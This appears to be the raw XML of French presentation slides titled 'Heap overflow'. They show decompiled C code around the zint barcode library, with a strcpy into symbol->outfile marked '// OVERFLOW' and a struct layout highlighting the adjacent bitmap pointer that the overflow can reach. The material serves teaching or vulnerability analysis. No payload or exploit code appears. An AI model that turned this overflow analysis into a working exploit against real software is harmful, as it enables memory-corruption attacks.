              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __int8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buffer</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00000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buff_len</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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highlight>
                  <a:srgbClr val="00FF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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int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err_code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zint_symbol_t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symbol</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008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// r6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> v10</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// r8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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symbol</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zint_symbol_t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ZBarcode_Create</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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symbol</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</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FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>outfile</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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strstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF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808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"png"</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&amp;&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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strstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF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808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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&amp;&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>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strstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF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808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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br>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 [...]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00000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br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>symbol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF00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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>outfile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008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// OVERFLOW </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03514BC2-0D6E-C834-52E3-B8B57123B17A}"/>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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6423B7B7-F1EA-D0FB-4AC2-FC7E8DFC6E66}"/>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1450892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90344AC-051A-529B-2942-AD7B385414BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6CFC26E-2C91-C6C1-E6F4-E336931B2C64}"/>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835AEB93-7636-76B8-052A-29AD0513AD32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEF9B00-748E-B0EB-3D13-F176219125B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1203613"/>
            <a:ext cx="3590295" cy="3647152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct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zint_symbol_t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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>outfile</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4096</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float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fscale</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option_1</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option_2</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option_3</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show_hrt</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input_mode</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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text</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128</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rows</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width</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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primary</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128</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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errtxt</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100</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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encoded_data</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31684</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row_height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>178</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8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bitmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highligh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bitmap_width</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bitmap_height</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struct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zint_render</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rendered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flèche : bas 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72C44BED-D3C4-ECC0-F87D-41FB1E3D785A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214123" y="1652704"/>
            <a:ext cx="481091" cy="2287183"/>
          </a:xfrm>
          <a:prstGeom prst="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C99AB8B7-C1CC-154E-B969-77F93A4AC74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326660" y="1285385"/>
            <a:ext cx="4955515" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>v10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ZBarcode_Encode_and_Print</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symbol</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buffer</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buff_len</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FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZBarcode_Clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>symbol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highligh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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZBarcode_Delete</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symbol</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endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="ZoneTexte 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAB86AA-8693-EA38-B53E-9B22A049AA8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278131" y="2048982"/>
            <a:ext cx="4762500" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fastcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZBarcode_Clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
